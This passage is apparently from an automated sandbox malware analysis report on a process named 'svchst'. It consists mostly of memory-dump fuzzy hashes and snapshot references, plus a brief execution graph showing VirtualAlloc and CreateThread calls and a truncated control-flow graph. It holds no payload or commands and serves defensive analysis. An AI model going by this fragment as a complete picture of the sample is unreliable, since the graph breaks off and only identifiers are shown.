                      • Opcode Fuzzy Hash: cc8ac5ee9bf93f8113eb7d817a97afb9f08d06d892555441699d9ad68a1f9032
                      • Instruction Fuzzy Hash: 26E01A74E40208FFD744EFA8D444BADBBF9EB44304F5440A9A908A7350E730AE94CBA5
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 518dd7de90efeba61c3ca87d605e31de749839ac415804f36bbacb26c088a2d2
                      • Instruction ID: f42d25c38923e3840b3fcf72f5471d9c9cda31011db123ab1aec0b5d0531c707
                      • Opcode Fuzzy Hash: 518dd7de90efeba61c3ca87d605e31de749839ac415804f36bbacb26c088a2d2
                      • Instruction Fuzzy Hash: C1E09271945284AFCB12DFB4A9207DABFF2AF07310B4405E6C145971A5DB704D4EDB41
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c716fba96e357d5ce62b5d0f4093370d0515cabbbca7249cd139fd94a237a29d
                      • Instruction ID: 9410440fa2ded2cc04b9e918726e13dae78567221f0d81d1b936f61f6b81ed6e
                      • Opcode Fuzzy Hash: c716fba96e357d5ce62b5d0f4093370d0515cabbbca7249cd139fd94a237a29d
                      • Instruction Fuzzy Hash: 0EF03971D0021A9BCB00EF98D8019EEFB74FF85324F508559DA1873240D7316A96CBE1
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 764f14f1f0495b24ca52d09f3e3f92fdb0607d82589086e95a019e434908bdf9
                      • Instruction ID: 200911da09a52b16519ca2241b60899ffa48816d9be07e5449d1af233e975bcb
                      • Opcode Fuzzy Hash: 764f14f1f0495b24ca52d09f3e3f92fdb0607d82589086e95a019e434908bdf9
                      • Instruction Fuzzy Hash: 30F01534908288AFC705DFA8D990A59FFB0EF46304F1881EAD8489B392D7319A55CB91
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a15c0c163e551d99e24d0b5a2191f307ab11fbf56c0657c0ff3f2f4a5da78ca
                      • Instruction ID: 6a2a3e0c72251294ad6c8fd33c0a94da4a751d183ae339f3fe01b9cba9803851
                      • Opcode Fuzzy Hash: 6a15c0c163e551d99e24d0b5a2191f307ab11fbf56c0657c0ff3f2f4a5da78ca
                      • Instruction Fuzzy Hash: E7E07E74D01308EFCB54DFA8E544A9DBBB6BB48300F5081AA9814A2340E735AAA5DF85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c145825ee833edfded12fa172bccdd29d85797898142bc2c4a6c3536b37401f9
                      • Instruction ID: cc4b95a9f959fdcef14023e83fbcc805957d84675f186d7df2e9f277445fbdd3
                      • Opcode Fuzzy Hash: c145825ee833edfded12fa172bccdd29d85797898142bc2c4a6c3536b37401f9
                      • Instruction Fuzzy Hash: 99E07574E50208EFCB44DFA8E444A9DBBF4FB48311F1081A9D914A7350D735AE54DF91
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ced65f0c4b68145d7d1e2eff2411def7f48d2e7742e707eb2adb2056d5458983
                      • Instruction ID: 9e1bd7cb137a0ad85c565344ad29ab5c02eb2c2117a7050db123c866af9bd981
                      • Opcode Fuzzy Hash: ced65f0c4b68145d7d1e2eff2411def7f48d2e7742e707eb2adb2056d5458983
                      • Instruction Fuzzy Hash: 2CE07E74E00208EFCB44DFA8E544A9DBBF4FB49700F1081A9D919A7360D734AA54DF85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 77c208c0c66f13114f627820ac848533f71d2998e3aceb1e5595c911fddbfd16
                      • Instruction ID: 06e38a7b45f02fd49f28b1b87e70582a16904a9ab9e9b1a6e352c0bb0fecb1f8
                      • Opcode Fuzzy Hash: 77c208c0c66f13114f627820ac848533f71d2998e3aceb1e5595c911fddbfd16
                      • Instruction Fuzzy Hash: F8E05274E00208AFCB54DFA8D444A9DBBF4FB49310F1081AA9918A7360D635AA54DF81
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f3b55c55e082f36118a976d236fe051330cfcfa4ba758a757f983df7eab0bacf
                      • Instruction ID: dbe9a4d9242a983481cfd11a309bfefc60111ad8b1e41f5b177b6fdc278f1afd
                      • Opcode Fuzzy Hash: f3b55c55e082f36118a976d236fe051330cfcfa4ba758a757f983df7eab0bacf
                      • Instruction Fuzzy Hash: 4BE086108841D15FEB1203E470663E13FF6C713318F0809D1D0D48605BCB5A04EBD711
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a947815fe267e17883cbbcd203551fd147a020392e02b4c24885bb0e52c7937b
                      • Instruction ID: 881fdd05d1d1f0a02ff519a548ec34b15ebdcf636d6e3bae10c53f9f020a08b5
                      • Opcode Fuzzy Hash: a947815fe267e17883cbbcd203551fd147a020392e02b4c24885bb0e52c7937b
                      • Instruction Fuzzy Hash: ADF0F2B0C50128CFDB20CF64D888BE9B7B6AB48304F4044E9D909A3210C7B44ED4CF10
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 92a3b0b5f9ef0c4e006754126874f08f8719c5f462cf78b2f639fb814beeb048
                      • Instruction ID: bb88d12ca6d856c1a45bbac98788e05fb8d2d12304720c2b8e96b74b55f73d43
                      • Opcode Fuzzy Hash: 92a3b0b5f9ef0c4e006754126874f08f8719c5f462cf78b2f639fb814beeb048
                      • Instruction Fuzzy Hash: CBF0A5B4911568CFDB209F94DD887D9B7B6BB48315F0008D5D509A6640C7B84ED8CF10
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 588f6c74fa275f1ca8c1841f952424d89308f538d6119139e2845f308543979f
                      • Instruction ID: 1b9a49378ea60da7dfbb68743f3910e0c7f28cb86f7877676159e1e1428f46cc
                      • Opcode Fuzzy Hash: 588f6c74fa275f1ca8c1841f952424d89308f538d6119139e2845f308543979f
                      • Instruction Fuzzy Hash: 7EE0EE35C00208FFCB04DF98E804AADBBB6FB48300F0085AAEC1462350C7319AA0EF80
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2cbddf76e7688140aa4d7e6e5fb6189fbc712b853a0e651ad6412c4a6802880
                      • Instruction ID: b81b1ceb02c696359fcf0313b18b61a4a5f93c284414c2bdfef6dbe2cdfc80f8
                      • Opcode Fuzzy Hash: b2cbddf76e7688140aa4d7e6e5fb6189fbc712b853a0e651ad6412c4a6802880
                      • Instruction Fuzzy Hash: 53E0C238900208EFCB00DFA8D544A9CBBB5FB48300F1081A9E80467360C731AA94DB84
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8cb632c7e62cd897b6c1f99efabc7ba94683113dbabcf1ae57e791c8a1f8d8c
                      • Instruction ID: 3e17321f8b4eaab70ace6196be4dcdc12356a188498be814cb1d5d1e8d7d0d3f
                      • Opcode Fuzzy Hash: a8cb632c7e62cd897b6c1f99efabc7ba94683113dbabcf1ae57e791c8a1f8d8c
                      • Instruction Fuzzy Hash: 92E09270D00208EFCB54DFA9E4546ADBBF5BB45300F5085E9C828A7354D7359A54DF85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2aec7ddb9eca642da901d3e8f419b29147cde526094e95176a1052a29b97ae9f
                      • Instruction ID: 29be1e765125643dfd36f574ceb4dd71f569a57b346eaa4dbcb84c083ace8466
                      • Opcode Fuzzy Hash: 2aec7ddb9eca642da901d3e8f419b29147cde526094e95176a1052a29b97ae9f
                      • Instruction Fuzzy Hash: 70E09274D44208EFCB44DFA8E44469EBBF5BB49300F1086AA9818A3340D7745AA5DF85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 703b2557f1dcb5be69979d0ee1c751b24f17495036c9bad40ca5bf669491bd23
                      • Instruction ID: f39300fc269c7f52850d7d958d5ae20b0e629099af4644433e8d48330bf162cc
                      • Opcode Fuzzy Hash: 703b2557f1dcb5be69979d0ee1c751b24f17495036c9bad40ca5bf669491bd23
                      • Instruction Fuzzy Hash: 99E01234C00308FBCB05EFE8E514AACBBB6BB44300F1081AAE85026254C7359AA4EF88
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04489c5ba53ac171255990abf0aba08220142566328358a47108c9eb4871a6de
                      • Instruction ID: fcd69ad7a02a6f7c78a8556fc06dbdc3f44a13c1ab232488843787af2a3634c5
                      • Opcode Fuzzy Hash: 04489c5ba53ac171255990abf0aba08220142566328358a47108c9eb4871a6de
                      • Instruction Fuzzy Hash: BFD01771C0120CBBE700EBE5A810A9ABBFAAB46300F5445A68505A3150EA719A149BD1
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 691cb34a9a769888bd420b59e29df350b232c9d1b4f76d5e11e7fab9dda43de0
                      • Instruction ID: e479287611bede9d7e2298eb7860513565eafb28aca4277e8eee7868a23c47c0
                      • Opcode Fuzzy Hash: 691cb34a9a769888bd420b59e29df350b232c9d1b4f76d5e11e7fab9dda43de0
                      • Instruction Fuzzy Hash: DDD0177280130CABDB00EBE5D914A9AB7F9AB4A304F5045A58515A3560EB729E149BD1
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6962aaf927b210ebf9b85ba3939c67bf599f98bbfca75b4d0c48b45fb198f4b
                      • Instruction ID: 8ee697bf877953b9fb36b01b21f795183d67e9dd87186ce0288bdb381f8148cb
                      • Opcode Fuzzy Hash: e6962aaf927b210ebf9b85ba3939c67bf599f98bbfca75b4d0c48b45fb198f4b
                      • Instruction Fuzzy Hash: 11D01271841208EFCB01DFA5D90469BB7FAEB0A311F5009E5950593150EB715E58E7D1
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4e28f3fb629db0299c4f72fe548ecb2619665ec6af057f6ae25949a6839001c7
                      • Instruction ID: cc9dd0227146bd43bcff3ac4bb1e5af0522ab52d57c2f83cbd22f73e1317ffe8
                      • Opcode Fuzzy Hash: 4e28f3fb629db0299c4f72fe548ecb2619665ec6af057f6ae25949a6839001c7
                      • Instruction Fuzzy Hash: A4E0EC35C44208FFCB14EF94E81499DBBFABB45301F9081A9E80426250D7315AA8EB95
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1776e9fd24d178dc71e8e941e11740a10f0db816237e52ea112650ede2bce3b5
                      • Instruction ID: b7d6bea81e01f26c5c43c608fcfb4f51578e4a7b17bcb6267f9ad5a3fb264493
                      • Opcode Fuzzy Hash: 1776e9fd24d178dc71e8e941e11740a10f0db816237e52ea112650ede2bce3b5
                      • Instruction Fuzzy Hash: F4D0A7710CC2C70FD21517D474283B53FE1DB07320B4408E2C5858A873839944DBC250
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42e704039ae54ad1c9f7614158491ac93bd6d6fcc286bdb1c6f789472cd30cf8
                      • Instruction ID: 89db8f9ecb91c80472b8073e86415a6f7961e70e650afcde2c12ff3bc5cecea0
                      • Opcode Fuzzy Hash: 42e704039ae54ad1c9f7614158491ac93bd6d6fcc286bdb1c6f789472cd30cf8
                      • Instruction Fuzzy Hash: 02E09274D00208AFCB04DF98E555A9DBBB5EB88314F5081A9D818A7340D731AE56DB85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a478d5203f26ada1a70061d4f6d1e244d0308f2ab3a10b3748fee548203131ac
                      • Instruction ID: b2a54bd2c873f6d318d6e62c955750ccd26767217e8f325c760e6a0235689440
                      • Opcode Fuzzy Hash: a478d5203f26ada1a70061d4f6d1e244d0308f2ab3a10b3748fee548203131ac
                      • Instruction Fuzzy Hash: 04E01234904208EBC704DF94E541A5DBBB5FB45304F508299C80927340C7316E96DB85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 558615993dc3cc14a833860f9e8f3210754fb789c2384e2410360044d6b8065d
                      • Instruction ID: 85d10b107f11a3217961c02c5acead0a749deabeca52e3e25640a9a33b26d839
                      • Opcode Fuzzy Hash: 558615993dc3cc14a833860f9e8f3210754fb789c2384e2410360044d6b8065d
                      • Instruction Fuzzy Hash: 82E01275900208FFCB04DFA4E514E597BB9FB0A311F104194E90457361C731DD54EB55
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8551be2c64d8a9cc72d554c84b60c5238ddc86e5d153776ac0a4d6f8e3d2c8de
                      • Instruction ID: 4aa5608a83413b56a07c542e8c602aa9d0ee63ca9fe91b7d2140b5a7a853949e
                      • Opcode Fuzzy Hash: 8551be2c64d8a9cc72d554c84b60c5238ddc86e5d153776ac0a4d6f8e3d2c8de
                      • Instruction Fuzzy Hash: 87E01274910208EFC704DFA8E54496DBBB8FB49315F5081D8D80867360C7306E54DB85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e70edd6c263aa8e06434aac3614127d770871c79341a6711d2b3786f1d12b533
                      • Instruction ID: 9f26bcdd9cd03a74926e22e3fad74499b11e108beed7f9a50fa0301410f7bd5b
                      • Opcode Fuzzy Hash: e70edd6c263aa8e06434aac3614127d770871c79341a6711d2b3786f1d12b533
                      • Instruction Fuzzy Hash: 76F04E75D1522CDFDB218F60C948BDDBBB6AB48701F0040DA9809A3251D7750FD4DF61
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8680bc162ba52c3114f0c58cc83a8148fd6cc1dda8b088645d121a7395343ec1
                      • Instruction ID: 03158606da7a1a5eaa58c3e3f9f1f7b40a287240471a8fc48c9adb8b186cf1d0
                      • Opcode Fuzzy Hash: 8680bc162ba52c3114f0c58cc83a8148fd6cc1dda8b088645d121a7395343ec1
                      • Instruction Fuzzy Hash: 71D0A7300C93895FC30247D46868776BBFD9B07300B4808C1994486062C3A424A4CB55
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5ecdd6eacf0202adf7e224790bf2e915269cedd6d1397fb36647dbf0720d93ae
                      • Instruction ID: af61ebc740cfeeaa7bee2b6f8f9da8a1378bdcfd155d8edb21bde9750198c78f
                      • Opcode Fuzzy Hash: 5ecdd6eacf0202adf7e224790bf2e915269cedd6d1397fb36647dbf0720d93ae
                      • Instruction Fuzzy Hash: B4E04E74D11228DBDB218F90DD58ADEBBB2BB08310F004595D509A6264D7721E95DF00
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2599411427.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4d90000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cee7d3e937319b6e0683470a1f6a82d893dc439c81950d804fb2555c2c71d06b
                      • Instruction ID: e2d71104c1b0c4423337abd18811cf0ddf15bf02c27a9ef2c9d73d2e6bdeddf8
                      • Opcode Fuzzy Hash: cee7d3e937319b6e0683470a1f6a82d893dc439c81950d804fb2555c2c71d06b
                      • Instruction Fuzzy Hash: 6BD05E70C44248EBC700DBA4A51866DBFF4AB01301F4005A9C84422380D7741EA8EB91
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f3764d5f59fd770efde0bb7fda31dfe45ad23c42385004b96b6b81c79fc2e3f
                      • Instruction ID: 4206478cfb30bcfdd108739b09b526de40721638b0321dc65d282ec4abbed2be
                      • Opcode Fuzzy Hash: 7f3764d5f59fd770efde0bb7fda31dfe45ad23c42385004b96b6b81c79fc2e3f
                      • Instruction Fuzzy Hash: 7FD05270841209EFCB40DFA8A41866EB7F9EB0A300F4048A5A808D3200E7700E50AB80
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5cf02be04cfd863fd0ffa80358affbb3a94751ed4d85f94b67ca715d8914a8b2
                      • Instruction ID: fc9492dea649b1ae03ae6cea68b640bd3d7d7a9ceb327519408a889ba5d46efa
                      • Opcode Fuzzy Hash: 5cf02be04cfd863fd0ffa80358affbb3a94751ed4d85f94b67ca715d8914a8b2
                      • Instruction Fuzzy Hash: 9CD0A9608842A49AEB2243E4B01A7333EFF5311308F880CA0D24C8158AC7AA08E8CA62
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7fba7b228ab1a534dcd8700583f03dbe9b847c2fe4464d6f2517086f2509cd92
                      • Instruction ID: ea5261b3187d2cab09533be5fefd3b2452345f31f2aeab9b7d99760f60e9b62c
                      • Opcode Fuzzy Hash: 7fba7b228ab1a534dcd8700583f03dbe9b847c2fe4464d6f2517086f2509cd92
                      • Instruction Fuzzy Hash: F4B092318A579AABD2146AD8B42C77672EEB70230AF841D21960D518A18BE198A8C6D9
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1af7eb8abf04bec567b91a71c49184db5bfda299bca95744644a7f2e35b06a9a
                      • Instruction ID: c91fa300675b5deca0dfac88535d0b877ee1caf3c5e45571ca82cbed5a765bd3
                      • Opcode Fuzzy Hash: 1af7eb8abf04bec567b91a71c49184db5bfda299bca95744644a7f2e35b06a9a
                      • Instruction Fuzzy Hash: 1BC012B0910108AFE710DBA6CE89BBA77BAABC8308F008085A209A2114CB740CD48A24
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 192692dbf2ad80b8080e3926b7876648e58203af000ce1f3a0134d6ce6c029b2
                      • Instruction ID: 1eeb80c601d5e19319ca95234d7e09e36bb0d0c358cb3c06c5d9d47a12837745
                      • Opcode Fuzzy Hash: 192692dbf2ad80b8080e3926b7876648e58203af000ce1f3a0134d6ce6c029b2
                      • Instruction Fuzzy Hash: DBD0C970965288CFDB10CFC8E08879CFBB6AB09311F60489AD405A6609C3B18994CF01
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6bf26066bf8aa1c61a81bf27265632eb259716fe27393f62e9fc78cd60f39d15
                      • Instruction ID: a8daf8ae0872489354edcef2e68f522a664f59673c19ec08a5136293241caa30
                      • Opcode Fuzzy Hash: 6bf26066bf8aa1c61a81bf27265632eb259716fe27393f62e9fc78cd60f39d15
                      • Instruction Fuzzy Hash: 87C00238A96318DBEB208B50D89DB9DBB76BB89711F504085D84D37395C6711D94CE00
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2589342863.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_22a0000_svchst.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7929b1a936e3408b271bdc8291f63095afb6679017b6e2d7d0fc0b00e631d2fa
                      • Instruction ID: d5a59d8449fda6f05aed3675a0381ebef04c778fcc8cccd40ebcf2f3d29f8ebf
                      • Opcode Fuzzy Hash: 7929b1a936e3408b271bdc8291f63095afb6679017b6e2d7d0fc0b00e631d2fa
                      • Instruction Fuzzy Hash: 04C00234854218DBDF114B91C998BD9BB76BB48309F004485945D662658A7509A4DF10

                      Execution Graph

                      Execution Coverage:10.5%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:6
                      Total number of Limit Nodes:0
                      execution_graph 16844 2704040 16845 270408d CreateThread 16844->16845 16846 270410f 16845->16846 16841 2703e18 16842 2703e60 VirtualAlloc 16841->16842 16843 2703ecc 16842->16843

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 2534748-2534769 1 2534770-253484f 0->1 2 253476b 0->2 4 2534f46-2534f53 1->4 5 2534855-2534996 call 2530da0 1->5 2->1 7 2534f59-2534f6e 4->7 51 2534f0f-2534f39 5->51 52 253499c-25349f7 5->52 8 2535674-253567d 7->8 10 2535683-253569a 8->10 11 2534f7c-2534f86 8->11 13 2534f88 11->13 14 2534f8d-2535081 call 2530da0 11->14 13->14 33 2535083-253508f 14->33 34 25350ab 14->34 36 2535091-2535097 33->36 37 2535099-253509f 33->37 38 25350b1-25350d1 34->38 39 25350a9 36->39 37->39 43 25350d3-253512c 38->43 44 2535131-25351b1 38->44 39->38 55 2535671 43->55 65 25351b3-2535206 44->65 66 2535208-253524b call 2530da0 44->66 62 2534f43 51->62 63 2534f3b 51->63 59 25349f9 52->59 60 25349fc-2534a07 52->60 55->8 59->60 64 2534e21-2534e27 60->64 62->4 63->62 67 2534e2d-2534eaa call 2530170 64->67 68 2534a0c-2534a2a 64->68 91 2535256-253525f 65->91 66->91 111 2534ef9-2534eff 67->111 71 2534a81-2534a96 68->71 72 2534a2c-2534a30 68->72 75 2534a98 71->75 76 2534a9d-2534ab3 71->76 72->71 77 2534a32-2534a3d 72->77 75->76 80 2534ab5 76->80 81 2534aba-2534ad1 76->81 82 2534a73-2534a79 77->82 80->81 87 2534ad3 81->87 88 2534ad8-2534aee 81->88 85 2534a7b-2534a7c 82->85 86 2534a3f-2534a43 82->86 90 2534aff-2534b41 85->90 92 2534a45 86->92 93 2534a49-2534a61 86->93 87->88 94 2534af0 88->94 95 2534af5-2534afc 88->95 98 